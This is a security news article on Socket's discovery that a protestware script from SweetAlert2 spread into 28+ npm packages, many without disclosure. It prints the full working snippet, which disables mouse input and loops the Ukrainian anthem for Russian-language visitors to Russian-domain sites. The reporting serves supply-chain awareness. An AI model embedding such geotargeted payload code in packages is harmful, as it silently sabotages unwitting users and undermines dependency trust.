Hidden Protestware Found in 28+ npm Packages: Silently Targeting Russian Users

In a revelation for the JavaScript ecosystem, Socket’s Threat Research Team has uncovered the widespread proliferation of protestware hidden in popular npm packages—silently targeting Russian-language users by disrupting their browsing experience and broadcasting a political message.

“The team has found the same protestware script across at least 28 new packages with nearly 2,000 versions,” the report explains.

Protestware is software intentionally modified to express political opinions or enact cyber-activism. In this case, developers embedded code that detects Russian or Belarusian users and then:

• Disables mouse-based interactions
• Plays the Ukrainian national anthem

This payload activates only if:

1. The user is visiting .ru, .su, .by, or .рф domains.
2. Their browser language is set to Russian.
3. They are browsing via a web interface.

// Dear russian users visiting russian sites. Let's have fun.
	  if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|by|xn--p1ai)$/)) {
	    var now = new Date();
	    var initiationDate = localStorage.getItem('swal-initiation');
	    if (!initiationDate) {
	      localStorage.setItem('swal-initiation', "".concat(now));
	    } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
	      setTimeout(function () {
	        document.body.style.pointerEvents = 'none';
	        var ukrainianAnthem = document.createElement('audio');
	        ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
	        ukrainianAnthem.loop = true;
	        document.body.appendChild(ukrainianAnthem);
	        setTimeout(function () {
	          ukrainianAnthem.play()["catch"](function () {
	            // ignore
	          });
	        }, 2500);
	      }, 500);
	    }
	  }

The code first appeared in SweetAlert2, a highly popular UI library with 700,000+ weekly downloads. The package author, known as limonte, openly acknowledged the inclusion:

“As a consequence of the illegal war in Ukraine, the behavior of this repository is different for .ru, .su, .by, and .рф domain zones.”

Since version 11.6.14, this behavior has been disclosed, though Socket discovered that many other packages reused the code without disclosing it, creating a hidden supply chain ripple effect.

The protestware has now spread silently into dozens of other packages, sometimes with no link to the original protest source or disclosure. Examples include:

• @starlawfirm/counsel-function
• falcon-library-comp
• currency_contry_exchange
• @flasher/flasher-sweetalert
• meshcentral
• coone-annotation-tool
• kdpa-components

These were often cloned or forked from SweetAlert2 or used as dependencies, carrying the payload forward without awareness or transparency.

Socket’s findings show the fragility of open-source trust, as even minor embedded behavior can propagate unintentionally and widely—impacting users who had no intent to engage in the protest.

Related Posts:

• Malicious npm Packages Exploiting Typosquatting to Inject SSH Backdoors
• AsukaStealer: Analysis of a New Information-Stealing Malware
• Malicious npm Packages Backdoor Telegram Bot Developers
• Malicious npm Packages Threaten Crypto Developers: Keylogging and Wallet Theft Revealed
• SentinelOne Unveils: The Hidden Dangers of npm in Business Security

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy

Do Son

Do Son (aka Ddos) is a seasoned news reporter, bringing over a decade of expertise to the forefront of cyber security and technology reporting. My work provides timely and insightful analysis of emerging trends and critical developments in these rapidly evolving sectors.